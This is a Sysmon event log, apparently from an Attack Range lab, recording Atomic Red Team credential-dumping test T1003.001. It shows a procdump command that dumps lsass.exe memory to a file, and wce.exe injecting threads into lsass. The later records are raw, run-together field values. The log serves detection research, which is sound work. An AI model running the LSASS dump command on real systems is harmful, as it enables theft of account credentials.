  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

Record 25545 | Event ID 10 (ProcessAccess) v3 | RuleName -
  UtcTime: 2021-06-23 21:10:18.718
  SourceProcessGUID: {4DB9351A-A273-60D3-3C05-00000000CF01}  SourceProcessId: 6608  SourceThreadId: 4360
  SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetProcessGUID: {4DB9351A-A33A-60D3-5406-00000000CF01}  TargetProcessId: 696
  TargetImage: C:\Windows\system32\cmd.exe
  GrantedAccess: 0x1fffff
  CallTrace, frames 1-4: C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213
  CallTrace, frames 5-8: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64), four times
  CallTrace, remaining frames, all in C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll: +9beaa995(wow64)|+9beaa7fc(wow64)|+9bf3392d(wow64)|+9bea2a82(wow64)|+9c982034(wow64)|+9be6802a(wow64)|+9becba9c(wow64)|+9beadaab(wow64)|+9beadaab(wow64)|+9beadaab(wow64)|+9beadaab(wow64)|+9beadaab(wow64)|+9beadaab(wow64)|+9bead93c(wow64)|+9be9e65c(wow64)|+9bedacff(wow64)

Record 25544 | Event ID 1 (ProcessCreate) v5 | RuleName -
  UtcTime: 2021-06-23 21:10:18.730
  ProcessGuid: {4DB9351A-A33A-60D3-5406-00000000CF01}  ProcessId: 696
  Image: C:\Windows\System32\cmd.exe
  FileVersion: 10.0.14393.0 (rs1_release.160715-1616)  Description: Windows Command Processor  Product: Microsoft® Windows® Operating System  Company: Microsoft Corporation  OriginalFileName: Cmd.Exe
  CommandLine: "C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp"
  CurrentDirectory: C:\Users\ADMINI~1\AppData\Local\Temp\
  User: ATTACKRANGE\Administrator  LogonGuid: {4DB9351A-9F2A-60D3-AB7C-0C0000000000}  LogonId/TerminalSessionId (fused in the export): 0xc7cab2  IntegrityLevel: High
  Hashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A
  ParentProcessGuid: {4DB9351A-A273-60D3-3C05-00000000CF01}  ParentProcessId: 6608
  ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Record 25543 | Event ID 11 (FileCreate) v2 | RuleName -
  UtcTime: 2021-06-23 21:10:18.718
  ProcessGuid: {4DB9351A-A273-60D3-3C05-00000000CF01}  ProcessId: 6608
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetFilename: C:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt
  CreationUtcTime: 2021-06-23 21:09:49.615

Record 25542 | Event ID 11 (FileCreate) v2 | RuleName -
  UtcTime: 2021-06-23 21:10:18.718
  ProcessGuid: {4DB9351A-A273-60D3-3C05-00000000CF01}  ProcessId: 6608
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetFilename: C:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt
  CreationUtcTime: 2021-06-23 21:09:49.615

Record 25541 | Event ID 23 (FileDelete) v5 | RuleName -
  UtcTime: 2021-06-23 21:10:18.671
  ProcessGuid: {4DB9351A-A273-60D3-3C05-00000000CF01}  ProcessId: 6608  User: ATTACKRANGE\Administrator
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetFilename: C:\Users\Administrator\AppData\Local\Temp\art-out.txt
  Hashes: MD5=A91F79A4F5BDEF89A44AC00BEF14720B,SHA256=0BC92AF0F2A87855A54D28CB2BC39854CC9FF672A4A203AC06A909BFFB2BD1DD,IMPHASH=00000000000000000000000000000000
  IsExecutable: false  Archived: true

Record 25540 | Event ID 23 (FileDelete) v5 | RuleName -
  UtcTime: 2021-06-23 21:10:18.656
  ProcessGuid: {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId: 3068  User: NT AUTHORITY\SYSTEM
  Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename: C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes: MD5=F79DF8C633AB64B8F703092628332A7C,SHA256=DF1F85B1C5C45100B65068A4B29D0B548E491052A72B5A2BE4B92A793E8847C6,IMPHASH=00000000000000000000000000000000
  IsExecutable: false  Archived: true

Record 25539 | Event ID 23 (FileDelete) v5 | RuleName -
  UtcTime: 2021-06-23 21:10:18.624
  ProcessGuid: {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId: 3068  User: NT AUTHORITY\SYSTEM
  Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename: C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational
  Hashes: MD5=B842435ED965443E0CD3B3673F3AF864,SHA256=B501C44BDBAB91CCCF9BFB5E6717A4C74E3F68BC1D63F2CEC5CD27FC4D9D9A4C,IMPHASH=00000000000000000000000000000000
  IsExecutable: false  Archived: true

Record 25538 | Event ID 23 (FileDelete) v5 | RuleName -
  UtcTime: 2021-06-23 21:10:18.579
  ProcessGuid: {4DB9351A-A339-60D3-5106-00000000CF01}  ProcessId: 6836  User: ATTACKRANGE\Administrator
  Image: C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe
  TargetFilename: C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe
  Hashes: MD5=605560CA0624AABF9F53675257B9BE21,SHA256=7234C8F98B87593641BBDB594E34C94B9436986C4FB70E7DA5BCECFF147D14C3,IMPHASH=E96A73C7BF33A464C510EDE582318BF2
  IsExecutable: true  Archived: true

Record 25537 | Event ID 5 (ProcessTerminate) v3 | RuleName -
  UtcTime: 2021-06-23 21:10:18.562
  ProcessGuid: {4DB9351A-A339-60D3-5206-00000000CF01}  ProcessId: 6980
  Image: C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe

Record 25536 | Event ID 12 (RegistryEvent, object create/delete) v2 | RuleName -
  EventType: DeleteKey  UtcTime: 2021-06-23 21:10:18.562
  ProcessGuid: {4DB9351A-9DDB-60D3-0A00-00000000CF01}  ProcessId: 620
  Image: C:\Windows\system32\services.exe
  TargetObject: HKLM\System\CurrentControlSet\Services\WCESERVICE

Record 25535 | Event ID 13 (RegistryEvent, value set) v2 | RuleName T1031,T1050
  EventType: SetValue  UtcTime: 2021-06-23 21:10:18.562
  ProcessGuid: {4DB9351A-9DDB-60D3-0A00-00000000CF01}  ProcessId: 620
  Image: C:\Windows\system32\services.exe
  TargetObject: HKLM\System\CurrentControlSet\Services\WCESERVICE\Start
  Details: DWORD (0x00000004)

Record 25534 | Event ID 5 (ProcessTerminate) v3 | RuleName -
  UtcTime: 2021-06-23 21:10:18.562
  ProcessGuid: {4DB9351A-A339-60D3-5306-00000000CF01}  ProcessId: 5972
  Image: C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe

Record 25533 | Event ID 13 (RegistryEvent, value set) v2 | RuleName -
  EventType: SetValue  UtcTime: 2021-06-23 21:10:18.562
  ProcessGuid: {4DB9351A-9DDB-60D3-0A00-00000000CF01}  ProcessId: 620
  Image: C:\Windows\system32\services.exe
  TargetObject: HKLM\System\CurrentControlSet\Services\WCESERVICE\DeleteFlag
  Details: DWORD (0x00000001)

Record 25532 | Event ID 23 (FileDelete) v5 | RuleName -
  UtcTime: 2021-06-23 21:10:18.562
  ProcessGuid: {4DB9351A-A339-60D3-5306-00000000CF01}  ProcessId: 5972  User: NT AUTHORITY\SYSTEM
  Image: C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe
  TargetFilename: C:\Windows\Temp\wceaux.dll
  Hashes: MD5=A024AF6D8E29527A722CB5DA2F8ECE55,SHA256=F3229244CCC349E3EC843EB6BAD547C559FE52795393E949D45170086108237B,IMPHASH=D34166060112FC82FCC2E4C9358CAADD
  IsExecutable: true  Archived: true

Records 25531 down to 25496 alternate between Event ID 8 and Event ID 10, all from the same source process against lsass.exe. Fields common to every Event ID 8 (CreateRemoteThread) v2 record, RuleName -:
  SourceProcessGuid: {4DB9351A-A339-60D3-5306-00000000CF01}  SourceProcessId: 5972
  SourceImage: C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe
  TargetProcessGuid: {4DB9351A-9DDB-60D3-0B00-00000000CF01}  TargetProcessId: 628
  TargetImage: C:\Windows\System32\lsass.exe
  StartAddress: 0x00000277FAAD082C  StartModule: -  StartFunction: -
Fields common to every Event ID 10 (ProcessAccess) v3 record, RuleName -:
  SourceProcessGUID: {4DB9351A-A339-60D3-5306-00000000CF01}  SourceProcessId: 5972  SourceThreadId: 716
  SourceImage: C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe
  TargetProcessGUID: {4DB9351A-9DDB-60D3-0B00-00000000CF01}  TargetProcessId: 628
  TargetImage: C:\Windows\system32\lsass.exe
  GrantedAccess: 0x1fffff
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

  Record   UtcTime (2021-06-23)   Event ID   NewThreadId (Event ID 8 only)
  25531    21:10:18.531           8          4024
  25530    21:10:18.531           10
  25529    21:10:18.515           8          3416
  25528    21:10:18.515           10
  25527    21:10:18.499           8          7096
  25526    21:10:18.499           10
  25525    21:10:18.484           8          7132
  25524    21:10:18.484           10
  25523    21:10:18.484           23         (FileDelete by splunk-winevtlog.exe; full record below)
  25522    21:10:18.452           8          4776
  25521    21:10:18.452           10
  25520    21:10:18.437           8          6340
  25519    21:10:18.437           10
  25518    21:10:18.421           8          6852
  25517    21:10:18.421           10
  25516    21:10:18.390           8          5004
  25515    21:10:18.374           10
  25514    21:10:18.327           8          3912
  25513    21:10:18.327           10
  25512    21:10:18.312           8          5328
  25511    21:10:18.296           10
  25510    21:10:18.250           8          2872
  25509    21:10:18.250           10
  25508    21:10:18.202           8          6492
  25507    21:10:18.202           10
  25506    21:10:18.171           8          2096
  25505    21:10:18.171           10
  25504    21:10:18.140           8          6416
  25503    21:10:18.140           10
  25502    21:10:18.124           8          6484
  25501    21:10:18.124           10
  25500    21:10:18.077           8          1300
  25499    21:10:18.077           10
  25498    21:10:18.046           8          4772
  25497    21:10:18.046           10
  25496    21:10:17.999           8          920

Record 25523 | Event ID 23 (FileDelete) v5 | RuleName -
  UtcTime: 2021-06-23 21:10:18.484
  ProcessGuid: {4DB9351A-9DFF-60D3-7600-00000000CF01}  ProcessId: 3068  User: NT AUTHORITY\SYSTEM
  Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename: C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security
  Hashes: MD5=3BCA8F05DA38905A35C4DE3381B53602,SHA256=88AFBE1163492296A28B44A037CB32385B7FE844954EC6F4AD47A526AF6BBF30,IMPHASH=00000000000000000000000000000000
  IsExecutable: false  Archived: true

10341000x800000000000000025495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.999{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025580Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.749{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAC17D3A542B0ADF9377542B39412472,SHA256=C5134DCE5710330AD2049C9A99C90D733EC323354812B96AC43E07003799153E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025579Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.656{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBBF54EFEFDBFAE15004D8CD69DD78E5,SHA256=A6F536D4C97F5F5DBFAD4DBA2D46272CD343D2CB05F8C1F9A67D5AAE82EB3892,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025578Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:19.609{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3461D7D0DD6BD387BFC06394F2FFDB37,SHA256=2629B75AF396965C0CC696959187D92A73C86D853F3B8A6A9ABF272CC006199B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025577Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.531{4DB9351A-A33B-60D3-5606-00000000CF01}11765144C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+13110|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12b45|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12a65|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12722|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000025576Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.421{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeC:\Windows\Temp\lsass_dump.dmp2021-06-23 21:10:19.421 10341000x800000000000000025575Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:19.421{4DB9351A-A33B-60D3-5606-00000000CF01}11761688C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+7f7b|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000025574Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-06-23 21:10:19.421{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeHKU\S-1-5-21-229316442-2325824265-1712718341-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 10341000x800000000000000025573Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.374{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:19.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.343{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:19.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:19.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.343{4DB9351A-A33A-60D3-5506-00000000CF01}36925712C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+8a5b|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7800|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x800000000000000025566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:19.351{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F13DAB7D9CE88DDC0C80C2B9C5F422B5,SHA256=E2A7A9A803C6A4D2D503BB78A73CD9951E901BEB5FB450A2821EAF740FC48496,IMPHASH=E6F7F291413118F49398761021BAFCF2{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp 11241100x800000000000000025565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:10:19.343{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe2021-06-23 21:10:19.343 10341000x800000000000000025564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.328{4DB9351A-A33A-60D3-5506-00000000CF01}36925712C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7661|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 
13241300x800000000000000025563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-06-23 21:10:19.203{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeHKU\S-1-5-21-229316442-2325824265-1712718341-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 23542300x800000000000000025581Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:20.656{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B4C034B314EED4D43870651D812044E,SHA256=70C9BD02ADFE18D715A09C66299D78E56D10010C89CEACA4D19C72D2F8AA9314,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 